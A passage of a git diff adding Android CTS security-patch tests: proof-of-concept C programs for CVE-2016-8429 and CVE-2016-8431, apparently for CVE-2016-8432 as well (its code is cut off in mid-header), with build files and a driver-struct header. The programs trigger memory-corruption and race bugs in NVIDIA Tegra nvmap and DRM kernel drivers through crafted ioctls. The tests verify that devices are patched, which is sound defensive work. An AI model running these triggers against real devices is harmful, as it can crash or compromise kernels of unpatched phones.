+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+enum {
+ NVMAP_PAGES_UNRESERVE = 0,
+ NVMAP_PAGES_RESERVE
+};
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_alloc_handle g_real_alloc = {0};
+struct nvmap_cache_op_list g_op_list = {0};
+#define MAX_HANDLE_NUM (1000)
+int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
+int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+int trigger_nvmap_create() {
+ g_allocation->handle = -1;
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
+ return g_allocation->handle;
+}
+
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.handle = handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+ printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
+}
+
+void trigger_nvmap_free(int handle) {
+ ioctl(g_fd, NVMAP_IOC_FREE, handle);
+ printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ int i;
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 0x40;
+
+ g_real_alloc.align = 0x40;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+
+ g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
+ g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
+ g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ ((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
+ }
+ g_op_list.nr = MAX_HANDLE_NUM;
+ g_op_list.op = NVMAP_PAGES_RESERVE;
+}
+
+
+void create_handles() {
+ int i;
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ g_handles_for_alloc[i] = trigger_nvmap_create();
+ }
+
+}
+
+
+void trigger_rw_handle(int handle) {
+ ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
+ printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
+}
+
+int main(int argc, char**argv) {
+ int i;
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ prepare_data();
+ create_handles();
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_nvmap_alloc(g_handles_for_alloc[i]);
+ }
+
+ printf("[*] Begin to trigger bug....\n");
+ sleep(1);
+
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_rw_handle(g_handles_for_alloc[i]);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
new file mode 100644
index 0000000..bfe8718
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
new file mode 100644
index 0000000..293f617
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_create_handle g_allocation_dup;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+}
+
+void trigger_nvmap_create_dup(int fd) {
+ g_allocation_dup.fd = fd;
+ ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
+}
+
+void trigger_nvmap_alloc() {
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ alloc.handle = g_allocation->handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+}
+
+void trigger_nvmap_free(int fd) {
+ ioctl(g_fd, NVMAP_IOC_FREE, fd);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void prepare_data() {
+ void* data = (void *) memalign(0x1000, 4 * 0x1000);
+ //void* data = malloc(0x10000);
+ printf("[*] data = %p\n", data);
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+ g_allocation->handle = -1;
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-10, 2);
+
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+
+ while (1)
+ close(1024);
+}
+
+int main(int argc, char**argv) {
+
+ setup_privi_and_affinity(-10, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_nvmap_create();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
new file mode 100644
index 0000000..d0ef823
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8431
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
new file mode 100644
index 0000000..1cc0f29
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 1
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+
+struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+ gem_create.size = PAGE_SIZE;
+ return 0;
+}
+
+int main()
+{
+ int ret;
+ int i;
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].cmdbuf.offset = 8192;
+ relocs[i].target.handle = gem_create.handle;
+ relocs[i].target.offset = 8192;
+ }
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }else{
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
new file mode 100644
index 0000000..614d20b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8432
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
